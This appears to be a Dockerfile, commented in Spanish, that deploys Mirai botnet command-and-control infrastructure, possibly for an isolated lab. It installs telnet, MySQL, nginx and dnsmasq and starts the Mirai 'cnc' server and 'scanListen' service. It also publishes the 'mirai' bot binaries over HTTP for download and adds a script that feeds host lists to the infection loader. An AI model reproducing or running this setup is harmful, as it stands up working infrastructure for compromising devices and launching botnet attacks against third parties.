FROM --platform=linux/amd64 bitnami/minideb

ENV DEBIAN_FRONTEND noninteractive

# Ejecutar todo con bash

RUN rm /bin/sh && ln -s /bin/bash /bin/sh

# Instalar paquetes necesarios

RUN apt update && \
    apt install -q -y sudo git electric-fence wget iptables && \
    apt install -q -y nginx default-mysql-server default-mysql-client && \
    apt install -q -y telnet telnetd dnsmasq ufw && \
    apt install -y htop net-tools iputils-ping procps lsof && \
    apt clean autoclean -y && \
    apt autoremove -y && \
    rm -rf /var/lib/apt/lists/*

# Abrir puerto 23 del firewall

RUN sudo update-alternatives --set iptables /usr/sbin/iptables-legacy && \
    sudo ufw allow 23/tcp && \
    sudo ufw allow 101/tcp && \
    sudo ufw allow 80/tcp

# Instalar Go

RUN (test -f go1.13.15.linux-amd64.tar.gz || wget -nv https://go.dev/dl/go1.13.15.linux-amd64.tar.gz --no-check-certificate) && \
    tar -C /usr/local -xzf go1.13.15.linux-amd64.tar.gz && \
    rm -f go1.13.15.linux-amd64.tar.gz && \
    export PATH=$PATH:/usr/local/go/bin

ENV PATH "${PATH}:/usr/local/go/bin"

RUN echo "export PATH=\$PATH:/usr/local/go/bin" >> ~/.mirairc && \
    echo "export GOPATH=\$HOME/go" >> ~/.mirairc

# Instalar dependencias de Go

RUN go get github.com/go-sql-driver/mysql && \
    go get github.com/mattn/go-shellwords

# Otras cosas

RUN mkdir -p /mirai-bins
RUN mkdir -p /root/bins

COPY ./tmp/bin/cnc /bin/cnc
COPY ./tmp/bin/scanListen /bin/scanListen
COPY ./tmp/bin/loader /bin/loader
COPY ./tmp/bin/mirai* /mirai-bins/
COPY ./tmp/bin/dlr* /root/bins/

RUN source ~/.profile && \
    chmod -R 755 /mirai-bins && \
    mkdir -p /etc/maradns/logger/ && \
    rm -rf /var/www/html/* && \
    ln -s /mirai-bins /var/www/html/bins && \
    echo "source ~/.mirairc" >> ~/.bashrc && \
    source ~/.mirairc

# Crear la base de datos

COPY archivos/cnc-init-db.sql /root/init-db.sql

RUN mkdir -p /run/mysqld && \
    chown -R mysql:mysql /run/mysqld && \
    (mysqld --user=root &) && \
    sleep 5 && \
    mysqladmin -u root status && \
    mysql -u root < /root/init-db.sql && \
    rm /root/init-db.sql

RUN echo "[mysqld]" > /root/.my.cnf && \
    echo "user = root" >> /root/.my.cnf

# Configurar dnsmasq

COPY archivos/cnc-dnsmasq.conf /etc/dnsmasq.conf

RUN (killall dnsmasq || true) && dnsmasq

RUN echo "#!/bin/bash" > /root/load_hosts.sh && \
    echo "(cat \$1 | /bin/loader) &" >> /root/load_hosts.sh && \
    chmod 777 /root/load_hosts.sh

EXPOSE 23
EXPOSE 80
EXPOSE 101

ENTRYPOINT service nginx restart && (mariadbd &) && (scanListen &) && cnc

